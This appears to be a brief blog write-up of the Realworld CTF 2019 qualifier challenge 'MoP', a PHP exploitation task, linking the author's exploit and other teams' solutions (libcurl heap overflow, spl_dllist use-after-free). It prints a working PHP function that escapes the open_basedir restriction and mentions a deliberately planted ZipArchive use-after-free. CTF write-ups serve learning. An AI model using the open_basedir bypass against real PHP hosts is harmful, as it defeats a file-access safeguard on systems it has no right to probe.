Realworld CTF 2019 – Quals- MoP(PHP PWN [二])

You can find my exploit here.
https://gist.github.com/wupco/29f16a4936a599a243ea3c0f9c414e71

You can get attachment here.
https://github.com/chaitin/Real-World-CTF-2019-Quals-Attachment/tree/master/184c379a6f90b9e3fcbbdf3f57d8a388

Addition Intro

  1. An old path to bypass openbasedir.
function bypass_open_basedir(){
    if(!is_dir('/tmp/ab')){
        mkdir('/tmp/ab');
    }
    chdir('/tmp/ab');
    ini_set('open_basedir','..');
    chdir('..');
    chdir('..');
    chdir('..');
    chdir('..');
    ini_set('open_basedir','/');
}
  1. Detect use-after-free in ZipArchive

I've deleted a line of zip.c. (without assign zero after efree)

  1. exploit it.

Other awesome solutions

  1. libcurl heap overflow

https://blog.bushwhackers.ru/pwning-master-of-php-like-its-real-real-world-ctf/

  1. UAF on spl_dllist

https://github.com/junorouse/ctf/tree/master/2019/realworld/mop

  • 用支付宝打我
  • 用微信打我

发表评论

电子邮件地址不会被公开。 必填项已用*标注